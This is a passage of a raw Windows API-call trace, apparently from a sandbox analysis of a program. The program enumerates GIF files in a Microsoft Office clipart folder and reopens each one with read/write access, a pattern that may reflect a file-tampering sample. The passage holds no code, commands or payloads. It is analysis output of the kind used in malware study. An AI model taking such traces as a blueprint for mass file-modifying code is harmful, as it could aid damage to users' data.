hHeap=0x20000) returned 1 [0100.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0100.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.277] AreFileApisANSI () returned 1 [0100.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0100.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 69 [0100.277] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c30)) returned 1 [0100.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0100.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0100.277] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.277] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.277] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcb32840, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3a19, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00021_.GIF", cAlternateFileName="")) returned 1 [0100.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0100.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0100.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f008 [0100.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0100.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0100.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0100.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.278] AreFileApisANSI () returned 1 [0100.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0100.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0100.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.279] AreFileApisANSI () returned 1 [0100.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0100.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 69 [0100.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.279] GetFileType (hFile=0x27c) returned 0x1 [0100.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0100.279] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.279] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.279] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.280] CloseHandle (hObject=0x27c) returned 1 [0100.280] AreFileApisANSI () returned 1 [0100.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0100.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 69 [0100.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.280] GetFileType (hFile=0x27c) returned 0x1 [0100.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0100.280] CloseHandle (hObject=0x27c) returned 1 [0100.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0100.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0100.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0100.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0100.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0100.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0100.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.341] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.413] AreFileApisANSI () returned 1 [0100.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8afe0 [0100.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 69 [0100.413] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00021_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcb32840, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3a19)) returned 1 [0100.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0100.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0100.413] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.413] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.413] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a1c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00037_.GIF", cAlternateFileName="")) returned 1 [0100.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0100.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0100.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0100.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0100.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0100.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0100.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0100.414] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.414] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.414] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.414] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0100.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.414] AreFileApisANSI () returned 1 [0100.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0100.414] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.414] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.414] AreFileApisANSI () returned 1 [0100.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0100.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 69 [0100.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.415] GetFileType (hFile=0x27c) returned 0x1 [0100.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0100.415] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.415] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.416] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.416] CloseHandle (hObject=0x27c) returned 1 [0100.416] AreFileApisANSI () returned 1 [0100.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, 